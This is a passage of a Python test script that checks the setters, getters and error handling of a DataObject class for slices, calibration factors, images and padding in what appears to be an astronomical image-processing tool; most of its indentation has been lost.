print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setSlice")
print("Test setSlice with valid input")
try:
tests = tests + 1
slice1 = Slice(20,30,"Slice1",10, 600.0)
slice2 = Slice(40,50,"Slice2",15, 450.0)
slice3 = Slice(60,70,"Slice3",20, 230.0)
slicesExp = []
slicesExp.append(slice1)
slicesExp.append(slice2)
slicesExp.append(slice3)
data = DataObject(validfit,'Photoplot', validsnr)
data.setSlice(20,30,"Slice1",10, 600.0)
data.setSlice(40,50,"Slice2",15, 450.0)
data.setSlice(60,70,"Slice3",20, 230.0)
slicesOut = data.getSliceList()
equal = False
if(len(slicesExp) == len(slicesOut)):
equal = True
ii = 0
while( (ii < len(slicesExp)) and equal):
if(not(slicesExp[ii].equals(slicesOut[ii]))):
equal = False
ii = ii + 1
if(equal):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
slicesExpString = []
        for jj in range(len(slicesExp)): #iterates from jj=0 to jj=len(slicesExp)-1
            sliceExp = slicesExp[jj]
            slicesExpString.append(sliceExp.toString())
        slicesOutString = []
        for kk in range(len(slicesOut)):
            sliceOut = slicesOut[kk]
            slicesOutString.append(sliceOut.toString())
        print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(slicesExpString, slicesOutString))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setSlice with non-integer x")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot', validsnr)
data.setSlice("x",30,"Slice",5, 600.0)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSlice with non-integer y")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot', validsnr)
data.setSlice(20,"y","Slice",3, 450.0)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSlice with non-integer width")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot', validsnr)
data.setSlice(20,30,"Slice","width", 300.0)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSlice with non-float brightness")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSlice(20,30,"Slice",5,"Brightness")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSlice with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit,'Publication',validsnr)
data.setSlice(20,30,"Slice",5,300.0)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCurrSlice")
print("Test getCurrSlice with valid conditions")
try:
tests = tests + 1
sliceExp = Slice(10,20,"Slice",5, 600.0)
data = DataObject(validfit,'Photoplot',validsnr)
data.setSlice(10,20,"Slice",5, 600.0)
sliceOut = data.getCurrSlice()
sliceExpString = sliceExp.toString()
sliceOutString = sliceOut.toString()
if(sliceExpString == sliceOutString):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(sliceExpString,sliceOutString))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getCurrSlice with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit,'Publication',validsnr)
sliceOut = data.getCurrSlice()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setSliceYl")
print("Test setSliceYl with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
sliceYlExp = 15
data.setSlice(20,40,"SliceTest",5,600.0)
data.setSliceYl(sliceYlExp)
sliceOut = data.getCurrSlice()
sliceYlOut = sliceOut.getYl()
if(sliceYlExp == sliceYlOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(sliceYlExp, sliceYlOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setSliceYl with no Slice created")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSliceYl(25)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except NoSliceException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceYl with non-integer yl")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSlice(20,30,"Slice",5,600.0)
data.setSliceYl("yl")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceYl with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit,'Publication',validsnr)
data.setSliceYl(7)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setSliceYh")
print("Test setSliceYh with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
sliceYhExp = 55
data.setSlice(30,50,"SliceTest",5,600.0)
data.setSliceYh(sliceYhExp)
sliceOut = data.getCurrSlice()
sliceYhOut = sliceOut.getYh()
if(sliceYhExp == sliceYhOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted{}".format(sliceYhExp,sliceYhOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setSliceYh with no Slice created")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSliceYh(50)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except NoSliceException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceYh with non-integer yh")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSlice(20,30,"Slice",5,600.0)
data.setSliceYh("yh")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceYh with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
data.setSliceYh(3)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setSliceBrightnessDiff")
print("Test setSliceBrightnessDiff with valid input")
try:
tests = tests + 1
sliceTest = Slice(40,70,"SliceTest",3,600.0)
data = DataObject(validfit,'Photoplot',validsnr)
sliceBrightnessDiffExp = 25
data.setSlice(40,70,"SliceTest",3,600.0)
data.setSliceBrightnessDiff(sliceBrightnessDiffExp)
sliceOut = data.getCurrSlice()
sliceBrightnessDiffOut = sliceOut.getBrightnessDiff()
if(sliceBrightnessDiffExp == sliceBrightnessDiffOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected{}\nOutputted:{}".format(sliceBrightnessDiffExp,sliceBrightnessDiffOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setSliceBrightnessDiff with no Slice created")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSliceBrightnessDiff(30)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except NoSliceException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceBrightnessDiff with non-integer brightnessDiff")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSlice(20,30,"Slice",5,600.0)
data.setSliceBrightnessDiff("BrightnessDiff")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceBrightnessDiff with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
data.setSliceBrightnessDiff(3)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getSliceList")
print("Test getSliceList with valid conditions")
try:
tests = tests + 1
slicesExp = []
data = DataObject(validfit, 'Photoplot',validsnr)
slicesOut = data.getSliceList()
if(slicesExp == slicesOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(slicesExp, slicesOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getSliceList with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
slices = data.getSliceList()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setMeanCalibrationFactor")
print("Test setMeanCalibrationFactor with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
meanExp = 450.0
data.setMeanCalibrationFactor(meanExp)
meanOut = data.getMeanCalibrationFactor()
if(meanExp == meanOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(meanExp, meanOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setMeanCalibrationFactor with non-float input")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setMeanCalibrationFactor("NotAFloat")
print("FAILURE-No error occurred")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setMeanCalibrationFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
data.setMeanCalibrationFactor(2.5)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test getMeanCalibrationFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
cal = data.getMeanCalibrationFactor()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setPhotoplotImage")
print("Test setPhotoplotImage with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
figure = plt.figure()
data.setPhotoplotImage(figure)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPhotoplotImage with incorrect type")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.setPhotoplotImage("Not a matplotlib.figure.Figure")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setPhotoplotImage with incorrect flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
figure = plt.figure()
data.setPhotoplotImage(figure)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getPhotoplotImage")
print("Test getPhotoplotImage with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
photoImgExp = plt.figure()
data.setPhotoplotImage(photoImgExp)
photoImgOut = data.getPhotoplotImage()
if(photoImgExp == photoImgOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(photoImgExp, photoImgOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPhotoplotImage with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
photoImg = data.getPhotoplotImage()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
#Test Publication functions
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setAnnotatedImage")
print("Test setAnnotatedImage with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
figure = plt.figure()
data.setAnnotatedImage(figure)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setAnnotatedImage with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
data.setAnnotatedImage("Not a pyplot figure")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error")
failures = failures + 1
print("Test setAnnotatedImage with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
figure = plt.figure()
data.setAnnotatedImage(figure)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getAnnotatedImage")
print("Test getAnnotatedImage with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
figureExp = plt.figure()
data.setAnnotatedImage(figureExp)
figureOut = data.getAnnotatedImage()
if(figureExp == figureOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(figureExp, figureOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getAnnotatedImage with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
fig = data.getAnnotatedImage()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
#Test CheckPixels functions
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setCheckX")
print("Test setCheckX with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckX(1)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setCheckX with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckX("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckX with invalid value")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckX(-1)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidCoordException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckX with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
data.setCheckX(1)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCheckX with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
checkXExp = 10
data.setCheckX(checkXExp)
checkXOut = data.getCheckX()
if(checkXExp == checkXOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(checkXExp, checkXOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getCheckX with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
checkX = data.getCheckX()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setCheckY")
print("Test setCheckY with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckY(10)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setCheckY with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckY("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckY with invalid value")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckY(-1)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidCoordException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckY with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
data.setCheckY(1)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCheckY")
print("Test getCheckY with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
checkYExp = 100
data.setCheckY(checkYExp)
checkYOut = data.getCheckY()
if(checkYExp == checkYOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(checkYExp, checkYOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getCheckY with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
checkY = data.getCheckY()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing function with multiple tests
print("Test setCheckFactor")
print("Test setCheckFactor with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckFactor(float(1.0))
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setCheckFactor with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckFactor("Not a float")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckFactor with invalid value")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckFactor(float(-0.1))
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidZoomFactorException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
data.setCheckFactor(float(1.0))
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCheckFactor")
print("Test getCheckFactor with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
checkFactorExp = float(2.5)
data.setCheckFactor(checkFactorExp)
checkFactorOut = data.getCheckFactor()
if(checkFactorExp == checkFactorOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(checkFactorExp, checkFactorOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getCheckFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
zoomFactor = data.getCheckFactor()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setPixelImage")
print("Test setPixelImage with valid inputs")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
valid = plt.figure()
data.setPixelImage(valid)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPixelImage with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setPixelImage(1)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setPixelImage with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
valid = plt.figure()
data.setPixelImage(valid)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getPixelImage")
print("Test getPixelImage with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
pixImgExp = plt.figure()
data.setPixelImage(pixImgExp)
pixImgOut = data.getPixelImage()
if(pixImgExp == pixImgOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(pixImgExp, pixImgOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPixelImage with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
pixImg = data.getPixelImage()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setPadTop")
print("Test setPadTop with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'CheckPixels',validsnr)
data.setPadTop(20)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPadTop with non-integer input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setPadTop("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("Test setPadTop with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setPadTop(25)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getPadTop")
print("Test getPadTop with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
padTopExp = 25
data.setPadTop(padTopExp)
padTopOut = data.getPadTop()
if(padTopExp == padTopOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted{}".format(padTopExp, padTopOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPadTop with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getPadTop()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setPadBottom")
print("Test setPadBottom with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'CheckPixels',validsnr)
data.setPadBottom(20)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPadBottom with non-integer input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setPadBottom("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("Test setPadBottom with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setPadBottom(25)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getPadBottom")
print("Test getPadBottom with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
padBottomExp = 25
data.setPadBottom(padBottomExp)
padBottomOut = data.getPadBottom()
if(padBottomExp == padBottomOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted{}".format(padBottomExp, padBottomOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPadBottom with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getPadBottom()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setPadLeft")
print("Test setPadLeft with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'CheckPixels',validsnr)
data.setPadLeft(20)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPadLeft with non-integer input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setPadLeft("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("Test setPadLeft with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setPadLeft(25)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
